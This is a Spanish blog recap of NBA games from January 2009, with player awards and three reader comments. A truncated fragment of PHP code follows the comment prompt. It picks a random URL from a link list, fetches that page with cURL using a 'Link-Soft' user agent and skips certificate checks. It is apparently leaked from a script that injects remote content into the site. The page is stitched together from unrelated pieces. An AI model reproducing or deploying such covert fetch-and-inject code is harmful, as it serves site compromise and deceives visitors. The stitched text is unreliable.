La Crónica (7/1/2009)

08 de January de 2009 por txusma

La empanada verde está comenzando a preocupar hasta a sus más acérrimos seguidores. Lo que parecía que era sólo una reducción de la marcha para no quemar todas las velas en este inicio de temporada se ha convertido en 6 partidos perdidos de los últimos 8 jugados. Y ojo porque su próximo compromiso es una visita a los Cavs. Anoche, contra unos devaluados Rockets. Pierce es el único que mantiene el nivel mientras que Rondo personaliza el bajón de juego y resultados de los verdes. En cambio sus 2 principales rivales en el Este, Cleveland y Orlando, sacaron adelante sus compromisos. Los primeros, en un paseo frente a los Bobcats, y los segundos, con una gran victoria fuera de casa frente a los Atlanta Hawks. Con esta victoria los Magic se quedan a una sola de Boston.

Además de los Hawks en el Este también perdieron los Pistons frente a unos Blazers liderados por Aldridge y que se impusieron gracias a un canasta de Outlaw a falta de 8 segundos. Rudy Fernández cuajó un gran partido mientras que Sergio tuvo que ver cómo Bayless le robaba protagonismo en determinados momentos del partido. Stuckey e Iverson no estuvieron muy afortunados en el tiro y acabaron el partido con un 10 de 31.

En la lucha por los últimos puestos de los Playoffs del Este, ganaron los Nets a los Grizzlies a pesar de otro gran partido de Marc Gasol y gracias a las buenas actuaciones de Carter, Yi y Lopez (aquí hay pívot), perdieron los Heat frente a unos inspiradísimos Nuggets sin Carmelo y los 76ers se impusieron a los Bucks, rivales directos, con partidazo de Andre Miller. Toronto, sin Calderón, Moon ni O’Neal, se tomó la medicina Wizard y consiguió una trabajada victoria con un Bargnani que ve crecer su valor mercantil.

En el Oeste, victoria de los Lakers frente a los Warriors con un Gasol simplemente estratosférico (y un Bynum resucitado: ¡qué bien que viene GS para lucirse!) y derrota de los Suns frente a los Pacers. O’Neal, que venía en un estado de forma inmejorable, fue baja de última hora y en cambio, Granger dio otro pasito para estar en el All-Star de esta temporada y lleva anotados 35, 36 y 37 puntos en los últimos tres partidos. Por su parte los Hornets dieron la de arena frente a los Jazz y cayeron con una muy mala actuación de todo el equipo (menos Paul). Por parte de Utah, mal partido de Deron compensado por el principal candidato al MIP, Paul Millsap.

En la parte baja del Oeste, nueva victoria de los Wolves (¡y van 3 seguidas!) con partidazo de Randy Foye. Esta vez la víctima han sido los Oklahoma Thunder.

PREMIOS

MVP: Kobe le dijo a Pau que se desquitase de su mal partido ante los Hornets haciéndole 40 puntos a los Warriors. Y Gasol se lo tomó en serio: 33 puntos, 18 rebotes (su mejor marca como profesional) y 2 tapones logró el de Sant Boi para conducir a los Lakers al triunfo en el Oracle Arena y superar otras grandes actuaciones como las de Granger (37-5-6-4), Millsap (27-14-5), Andre Miller (28-9-6), Foye (32-6), Howard (23-19), Turkoglu (20-7-8) o Yao (26-8-4-2).

El rookie: Los novatos contaron con bastante protagonismo la pasada madrugada y es difícil quedarse con sólo una actuación. Destacamos, pues, varias: 26 puntos, 4 rebotes y 3 asistencias de OJ Mayo; 14 puntos, 10 rebotes y 3 robos de Marc; 17 puntos, 8 rebotes y 5 tapones de Brook Lopez; 16 puntos y 12 asistencias de Westbrook; y 16 puntos y 15 rebotes de Kevin Love.

La sorpresa: No fue ninguna actuación deslumbrante, pero difícilmente esperaba nadie los 9 puntos y 14 rebotes de Louis Admuson para los Suns. Aunque la sorpresa más agradable fue el retorno de Mike Dunleavy, con 14 puntos y 4 asistencias en el triunfo de los Pacers en Phoenix.

La decepción: El 3 de 13 en tiros para 9 puntos, con 2 rebotes, 1 asistencia y 2 pérdidas de Kevin Durant para unos Thunder que perdieron por 42 puntos en Minnesota.

El mayor esfuerzo en vano: Jamison, con 32 puntos, 7 rebotes y 4 robos, o Wade con 31y 4 asistencias, o incluso Biedrins que rozó el triple doble, vieron como sus grandes actuaciones se frustraron por las derrotas de sus equipos.

La pregunta del día: ¿A qué se debe la crisis de los Celtics?

Comenta

3 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Otro especialista en el clutch, este Outlaw.

    Lo de los Celtics… ummm, sí, estamos en enero; y sí, siguen siendo favoritos. Pero no deja de ser preocupante ¿no? Porque un susto se lo dan a cualquiera; y dos. Pero es que van 6 en dos semanas.

    Por su parte, los Lakers ganaron con un gran Pau (los Warriors siguen fabricando MVP’s) pero si la ausencia de Odom se alarga van a sufrir porque el calendario se pone cuesta arriba a partir de la semana que viene y van justísimos de efectivos. A ver si así Bynum despierta.

      Citar

  2. MagicJohnson32 dice:
    #2

    Ah, bueno, pero los Celtics no tienen de qué preocuparse. Todo se solucionaría fichando a Marbury. Juuuuaaaaas.

      Citar

  3. Jabho dice:
    #3

    La verdad es que ya van más de un par de sustos …

    La cosa es que yo veo mas equipo a Cavs o Lakers que a Celtics. Me parecía irreal que empezara como empezó. Es el campeón pero no la mejor plantilla (dudo que lo fuera la final del año pasado).

    Marbury con buena actitud es un pedazo de fichaje. Ala, a ver como vendría… Y un interior tipo PJ tampoco vendría nada mal.

    Nno éramos tan buenos y ahora tampoco hay hacer saltar las alarmas, aunque alguna incorporación es necesaria.

    Esta noche partidazo contra los Cavs. Mas conclusiones mañana.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>